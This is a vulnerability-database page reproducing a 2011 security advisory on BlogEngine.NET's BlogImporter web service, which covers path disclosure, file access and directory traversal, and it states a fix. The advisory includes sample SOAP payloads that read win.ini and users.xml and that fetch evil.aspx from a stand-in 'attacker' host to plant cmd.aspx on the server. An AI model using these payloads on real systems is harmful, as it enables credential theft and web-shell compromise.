Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

BlogEngine.NET Unauthorized Access / Directory Traversal

🗓️ 05 Jan 2011 00:00:00Reported by Deniz CevikType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

BlogEngine.NET unauthorized access and directory traversal, severity: Critica

Code
`Product: BlogEngine.NET  
Vendor informed: 24 Sep 2010  
Fixed Version Released: 01 Jan 2011  
Affected Versions: 1.6.x and prior versions  
Severtiy: Critical  
Impact: Information Discloure and System Compromise  
  
Description:  
  
BlogEngine.NET is an open source .NET blogging project that was born  
out of desire for a better blog platform. A blog platform with less  
complexity, easy customization, and one that takes advantage of the  
latest .NET features. We discovered several security problems in  
/api/BlogImporter.asmx web service which comes with default  
BlogEngine.NET installation.  
  
1- Path Disclose - Several functions of blogimporter.asmx such as  
AddComment or AddPost may reveal local path information of  
applications stored. A remote user can use this info to determine the  
full path of the web root directory.  
  
2- Unauthorized Access - "Source" parameter of GETFILE function may  
allow to access the files outside of the webroot directory. Attackers  
can use this problem to identify whether file is exist or not, or  
finding locations of system/configuration files such as win.ini,  
web.config etc. If the file exists in the requested path, application  
returns "true", if not exists application returns "false" messages in  
the http response. Sample portion of SOAP request which is causing the  
problem is as below.  
  
<GetFile xmlns="http://dotnetblogengine.net/">  
<source>c:\Windows\win.ini</source>  
<destination>string</destination>  
</GetFile>  
  
3- Directory Traversal and File Upload – "destination" parameter of  
GETFILE function prone to directory traversal attack with /../../  
sequence. Using this problem it is possible to upload files from  
remote sites to outsite of the App_Data/files directory which is  
normally cannot be accessible by web users, open important local  
configuration files (such as web.config, or App_Data/users.xml),  
seeing source code of applications, execute os commands via uploaded  
applications. This problem may allow an unauthorized users to fully  
compromise the target system.  
  
<GetFile xmlns="http://dotnetblogengine.net/">  
<source>c:\webroot\blog\App_Data\users.xml</source>  
<destination>../../aa.txt</destination>  
</GetFile>  
  
<GetFile xmlns="http://dotnetblogengine.net/">  
<source>http://attacker/evil.aspx</source>  
<destination>/../../cmd.aspx</destination>  
</GetFile>  
  
Solution:  
  
Upgrade to BlogEngine.Net 2.0 or remove /api/BlogImpoter.asmx.  
  
Deniz CEVIK  
Best Regards  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Jan 2011 00:00Current
0.5Low risk
Vulners AI Score0.5
blogengine.netunauthorized accessdirectory traversalinformation disclosuresystem compromisesecurity vulnerabilityfixed versionvendor notificationpath disclosurewebroot directoryunauthorized file accessdirectory traversal attackfile upload vulnerabilityupgrade solution
24